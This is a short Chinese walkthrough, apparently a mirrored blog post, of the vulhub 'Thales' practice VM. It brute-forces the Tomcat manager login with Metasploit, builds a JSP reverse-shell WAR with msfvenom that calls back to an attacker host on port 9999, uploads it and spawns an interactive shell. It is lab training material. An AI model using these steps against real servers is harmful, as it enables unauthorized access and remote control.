当前位置: 首页 > news >正文

vulhub-Thales靶场攻略

news 2025/7/31 12:45:55

1.我们打开靶机,可能会需要改一下网卡配置,博主之前写过,这里就不写了,我们找到所属网段去拿nmap去扫描

2.我们找到IP之后访问一下,界面如下

3.我们可以看到他有一个登录框,我们尝试着爆破一下

4.接下来我们拿msf来爆破一下

msfconsole
search tomcat login
set rhosts 192.168.142.153
run

5.我们来登录一下

6.我们发现有一个文件上传的地方,我们来构造war文件,去kali生成一个反弹shell文件

msfvenom  -p java/jsp_shell_reverse_tcp LHOST=192.168.142.137 LPORT=9999 -f war -o shell.war

7.然后我们开启监听,我们改一下生成的文件名为doma.war

8.连接上之后可以使用以下命令构造成一个交互的命令

python3 -c "import pty;pty.spawn('/bin/bash')"

http://www.lryc.cn/news/605164.html

相关文章:

  • LRU (Least Recently Used) 缓存实现及原理讲解
  • Python读取获取波形图波谷/波峰
  • PSO-TCN-BiLSTM-MATT粒子群优化算法优化时间卷积神经网络-双向长短期记忆神经网络融合多头注意力机制多特征分类预测/故障诊断Matlab实现
  • Undo、Redo、Binlog的相爱相杀
  • 2025年华为HCIA-AI认证是否值得考?还是直接冲击HCIP?
  • 鸿蒙(HarmonyOS)模拟(Mock)数据技术
  • NestJS CLI入门
  • HPCtoolkit的下载使用
  • 7.Origin2021如何绘制拟合数据图?
  • 网络安全学习第16集(cdn知识点)
  • python 中 `batch.iloc[i]` 是什么:integer location
  • 【MySQL 数据库】MySQL索引特性(一)磁盘存储定位扇区InnoDB页
  • NEG指令说明
  • Android补全计划 TextView设置文字不同字体和颜色
  • 全视通智慧护理巡视:做护理人员的AI助手
  • 关于vue __VUE_HMR_RUNTIME__ is not defined报错处理
  • plex客户端升级以后显示的内容太多了怎么办?
  • 比特币挖矿的能源消耗和环保问题
  • 【图像处理】直方图均衡化c++实现
  • 个人如何做股指期货?
  • 以ros的docker镜像为例,探讨docker镜像的使用
  • Docker常用命令速查手册:容器运维七维指南
  • 深入剖析 Spark Shuffle 机制:从原理到实战优化
  • STL:序列式容器
  • 轻松打造Unity小游戏AR体验
  • PHP语法高级篇(七):MySQL数据库
  • OSS-服务端签名Web端直传+STS获取临时凭证+POST签名v4版本开发过程中的细节
  • Spring AOP详细解析
  • [硬件电路-106]:模拟电路 - 电路为什么会出现不同的频率特性?元件频率依赖性、信号传输路径、电路拓扑结构、外部因素
  • 【maven】仓库配置